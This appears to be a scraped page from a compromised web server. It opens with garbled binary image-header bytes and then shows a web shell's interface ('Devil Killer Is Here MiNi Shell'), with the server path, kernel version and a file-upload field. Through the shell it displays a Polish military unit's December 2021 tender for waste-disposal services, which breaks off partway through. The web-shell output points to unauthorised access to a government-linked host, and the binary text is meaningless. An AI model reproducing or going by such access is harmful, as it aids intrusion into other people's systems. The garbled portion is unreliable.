JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211208/0030410901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> USŁUGA POLEGAJĄCA NA ODBIORZE I UNIESZKODLIWIENIU ODPADÓW POKONSUMPCYJNYCH, MEDYCZNYCH, NIEBEZPIECZNYCH I INNYCH NIŻ NIEBEZPIECZNE POCHODZĄCE Z TERENÓW ADMINISTROWANYCH PRZEZ <br/>31. WOG </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">31 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Sekcja Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 101067256</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Konstantynowska 85</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgierz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">42 261 442 185</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">31wog.zp@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://31wog.wp.mil.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> USŁUGA POLEGAJĄCA NA ODBIORZE I UNIESZKODLIWIENIU ODPADÓW POKONSUMPCYJNYCH, MEDYCZNYCH, NIEBEZPIECZNYCH I INNYCH NIŻ NIEBEZPIECZNE POCHODZĄCE Z TERENÓW ADMINISTROWANYCH PRZEZ <br/>31. WOG </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9f43572e-5730-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00304109</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/31wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/31wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim elektronicznie <br/>za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/31wog<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były <br/>za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość <br/>do zamawiającego”. <br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>Wszelkie zapisy dotyczące korespondencji elektronicznej znajduje się w SWZ w rozdziale VIII.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/31wog</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych <br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.	administratorem Pani/Pana danych osobowych jest 31. WOJSKOWY ODDZIAŁ GOSPODARCZY, ul. Konstantynowska 85, 95 – 100 ZGIERZ, tel. 261 442 002, 31wog.kancelaria@ron.mil.pl reprezentowany przez KOMENDANTA,<br/><br/>2.	u administratora danych osobowych wyznaczony jest Inspektor Ochrony Danych Osobowych, z którym można się skontaktować poprzez email: 31wog.iod@ron.mil.pl. lub telefonicznie nr 261 442 275,<br/><br/>3.	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniami o udzielenie zamówienia publicznego,<br/><br/>4.	odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; <br/><br/>5.	dane osobowe Wykonawcy będą przechowywane, zgodnie art. 78 ustawy PZP, w zw. z Jednolitym Rzeczowym Wykazem Akt 31.Wojskowego Oddziału Gospodarczego, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/><br/>6.	obowiązek podania przez Wykonawcę danych osobowych dotyczących bezpośrednio Wykonawcy jest wymogiem ustawowym określonym <br/>w przepisach ustawy PZP, związanym z udziałem w postępowaniu <br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP; <br/>7.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8.	Wykonawca posiada:<br/>−	na podstawie art. 15 RODO, prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>−	na podstawie art. 16 RODO, prawo do sprostowania danych osobowych Wykonawcy *;<br/>−	na podstawie art. 18 RODO, prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych osobowych dotyczących Wykonawcy narusza przepisy RODO;<br/>9.	Wykonawcy nie przysługuje:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art.. 6 ust. 1 lit. c RODO.<br/>_____________________<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">22/ZP/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> USŁUGA ODBIORU I UNIESZKODLIWIENIE ODPADÓW POKONSUMPCYJNYCH <br/>1)Rodzaj, ilość, miejsce, częstotliwość oraz warunki odbioru odpadów pokonsumpcyjnych o kodzie 20 01 08 (zgodnie z obowiązującym katalogiem odpadów- Dz.U. 2020 poz.10) odpadów kat. III (produkty ubocznych pochodzenia zwierzęcego) powstałych w związku z żywieniem żołnierzy przedstawiono w tabeli w rozdziale III w SWZ.<br/>Łączna ilość szacunkowa odpadów: 156 000 kg <br/><br/>2)	Wykonawca usługi akceptuje fakt, że ilości odpadów są szacunkowe <br/>i w trakcie realizacji umowy mogą ulec zmniejszeniu, przy czym Wykonawcy będzie należało się wynagrodzenie za faktyczną ilość odebranych odpadów. Zmniejszenie ilości odbioru odpadów może nastąpić w szczególności w przypadku rozformowania poszczególnych jednostek i zaprzestania przez nie działalności, o czym Zamawiający powiadomi Wykonawcę. Zmniejszenie ilości może być związane również w związku z pandemią koronawirusa COVID-19. Zwiększenie częstotliwości odbioru odpadów może nastąpić w przypadku działań mobilizacyjnych, ćwiczebnych i będzie regulowane w formie pisemnej. <br/> <br/>3)	Wykonawca musi posiadać niezbędną wiedzę i doświadczenie oraz dysponować odpowiednim potencjałem technicznym i osobami zdolnymi <br/>do realizacji przedmiotu zamówienia. <br/><br/>4)	Wykonawca w ramach zamówienia będzie dokonywał odbioru <br/>i unieszkodliwiania odpadów, których przewóz musi odbywać się <br/>w hermetycznie zamykanych pojemnikach o pojemności od 60 l do 120 l.<br/> <br/>5)	Wykonawca zapewni Zamawiającemu na czas obowiązywania umowy niezbędne ilości sprawnych technicznie, hermetycznie zamykanych, czystych, wymiennych pojemników, w celu zabezpieczenia przechowywania odpadów do kolejnego odbioru. Wykonawca będzie utrzymywał w czystości pojemniki zapewniając ich dezynfekcję we własnym zakresie po każdym użyciu.<br/><br/>6)	Wykonawca opisze pojemniki określając ich pojemność w litrach oraz rodzaj odpadów (odpady kat. III – o kodzie 20 01 08).<br/><br/>7)	Ilości odpadów będą oceniane na podstawie ważenia kolejnych partii odpadów. Wykonawca zabezpieczy wagę do ważenia odpadów przy przekazywaniu.<br/><br/><br/>8)	Waga musi spełniać wymagania metrologiczne wymagane przy obrocie towarowym oraz posiadać deklaracje zgodności lub tabliczkę znamionową <br/>z pierwotną lub wtórną legalizacją wagi ważną przez cały okres obowiązywania umowy.<br/><br/>9)	Przekazanie odpadów odbywać się będzie przez upoważnioną osobę <br/>na podstawie wystawionego Dokumentu Handlowego przy przewozie ubocznych produktów pochodzenia zwierzęcego kategorii III. Dokument Handlowy musi być zgodny ze wzorem określonym w Rozporządzeniu Ministra Rolnictwa i Rozwoju Wsi z dnia 16.06.2020 r. zmieniającym rozporządzenie <br/>w sprawie wzoru dokumentu handlowego stosowanego przy przewozie, wyłącznie na terytorium Rzeczypospolitej Polskiej, produktów ubocznych pochodzenia zwierzęcego i produktów pochodnych.(Dz.U.2020 poz. 1090) Dokument Handlowy będzie podstawą do wystawienia faktury VAT. <br/><br/>10)	Wykonawca zobowiązuje się postępować z odpadami w sposób zgodny <br/>z powszechnie obowiązującymi przepisami, a w szczególności z: <br/>	Rozporządzeniem (WE) nr 1069/2009 Parlamentu Europejskiego I Rady z dnia 21 października 2009 r. ustanawiającym przepisy sanitarne dotyczące produktów ubocznych pochodzenia zwierzęcego nieprzeznaczonych <br/>do spożycia przez ludzi (Dz. Urz. WE L 300/1 z 14.11.2009 r z późn. zm.); <br/>	Ustawą z dnia 14 grudnia 2012 r. o odpadach (tekst jednolity Dz. U. 2021 r. poz. 779 z późn. zm.) <br/>	Ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tekst jednolity Dz. U. z 2021 poz. 1973 z późn. zm.)<br/><br/>11)	Sposób wyceny realizacji usługi:<br/> Wartość realizacji przedmiotu zamówienia będzie obejmowała wszystkie koszty wykonania przedmiotu usługi łącznie z kosztami osobowymi Wykonawcy, kosztami transportu, załadunku, zapewnienia pojemników <br/> i utrzymania ich w czystości itp.<br/>Szczegółowe wymagania zawarto w projektowanym postanowieniu umowy stanowiącym załącznik Nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierować się następującymi kryteriami oraz w następujący sposób będzie oceniać oferty:<br/>ZADANIE 1 <br/>KRYTERIUM A + B, gdzie:	Liczba punktów <br/>(waga)<br/>A	Liczba punktów uzyskanych w kryterium – cena oferty	80<br/>B	Liczba punktów uzyskanych w kryterium – lokalizacje punktów odbioru odpadów na terenie woj. łódzkiego	20<br/><br/>a.	Kryterium cena oferty – 80 pkt. <br/><br/> Cena brutto oferty najniżej skalkulowanej<br/>Cena = ---------------------------------------------------------------- x 80 (pkt.)<br/> Cena brutto badanej oferty <br/> <br/>Oferta, która uzyska najniższą cenę otrzyma maksymalną liczbę punktów – 80 pkt. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/><br/><br/>b.	Kryterium lokalizacja punktów odbioru odpadów – 20 pkt.<br/><br/>Przy ocenie ofert wg kryterium „ lokalizacja punktów odbioru odpadów na terenie woj. łódzkiego ” Zamawiający przydzieli następującą liczbę punktów:<br/><br/>Wykonawca, który oświadczy poprzez zaznaczenie w formularzu ofertowym , że punkty odbioru odpadów znajdują się na terenie woj. łódzkiego otrzyma – 20 pkt.<br/><br/>Wykonawca, który oświadczy, że punkty odbioru odpadów nie znajdują się na terenie woj. łódzkiego otrzyma – 0 pkt.<br/><br/>W celu potwierdzenia spełnienia tego kryterium należy w formularzu ofertowym – załączniku nr 6 do SWZ - oświadczyć, czy punkty odbioru odpadów znajdują się na terenie woj. łódzkiego, czy nie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba punktów uzyskanych w kryterium – lokalizacje punktów odbioru odpadów na terenie woj. łódzkiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> USŁUGA ODBIORU I UTYLIZACJI ODPADÓW MEDYCZNYCH<br/>1)	Rodzaje, ilości, miejsca i częstotliwość odbioru odpadów medycznych przedstawiono w tabelach w rozdziale III w SWZ (zadanie nr 2)<br/>1)	Wykonawca usługi akceptuje fakt, że ilości są szacunkowe i w trakcie realizacji umowy mogą ulec zmniejszeniu, nie mogą być jednak większe niż określone w w/w tabeli.<br/> <br/>2)	Dokładna ilość odbieranych odpadów medycznych zostanie każdorazowo określona w trakcie ich odbioru w wyniku ważenia przez Wykonawcę.<br/><br/>3)	Waga musi spełniać wymagania metrologiczne wymagane przy obrocie towarowym oraz posiadać deklaracje zgodności lub tabliczkę znamionową <br/>z pierwotną lub wtórna legalizacją wagi ważną przez cały okres obowiązywania umowy. <br/> <br/>4)	Każdorazowe przekazanie odpadów odbywać się będzie na podstawie Karty Przekazania Odpadu w systemie BDO<br/><br/>5)	Wykonawca musi posiadać niezbędną wiedzę i doświadczenie oraz dysponować odpowiednim potencjałem technicznym i osobami zdolnymi do realizacji przedmiotu zamówienia.<br/><br/>6)	Wykonawca usługi będzie unieszkodliwiał zakaźne odpady medyczne zgodnie <br/>z zasadą bliskości, o której mowa w Ustawie o odpadach z dnia 14 grudnia 2012 r. - art. 20 (tekst jednolity Dz. U. 2021 r. poz. 779 z późn. zm.)<br/><br/>7)	Usługi w zakresie odbioru, transportu i utylizacji odpadów medycznych odbywać się będą zgodnie z:<br/> - Ustawą o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz. U. 2021 r. poz. 779 z późn. zm.) ; <br/>- Rozporządzeniem Ministra Zdrowia z dnia 5 października 2017 r (Dz.U.2017 poz. 1975) w sprawie szczegółowego postępowania z odpadami medycznymi; <br/> -Ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku <br/>w gminach (tekst jednolity Dz. U. 2021 poz. 888 z późn. zm.) oraz obowiązującymi aktami wykonawczymi.<br/> - Rozporządzeniem Ministra Zdrowia z dnia 7 października 2016 r <br/>w sprawie szczegółowych wymagań dla transportu odpadów (Dz.U.2016, poz. 1742).<br/><br/>8)	Sposób wyceny realizacji usługi:<br/> Wartość realizacji przedmiotu zamówienia będzie obejmowała wszystkie koszty wykonania przedmiotu usługi łącznie z kosztami osobowymi Wykonawcy, kosztami transportu, załadunku, zapewnienia worków niezbędnych do bezpiecznego transportu itp.<br/>Szczegółowe wymagania zawarto w projektowanym postanowieniu umowy stanowiącej załącznik Nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">ZADANIE 2<br/><br/>KRYTERIUM A+B	WAGA<br/><br/>A	Liczba punktów uzyskanych w kryterium – cena oferty	100 pkt.<br/><br/>a)	Kryterium cena oferty – 100 pkt. <br/><br/> Cena brutto oferty najniżej skalkulowanej<br/>Cena = ---------------------------------------------------------------- x 100 (pkt)<br/> Cena brutto badanej oferty <br/> <br/>Oferta, która uzyska najniższą cenę otrzyma maksymalną liczbę punktów – 100 pkt. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> USŁUGA ODBIORU I UNIESZKODLIWIENIE ODPADÓW NIEBEZPIECZNYCH <br/>I 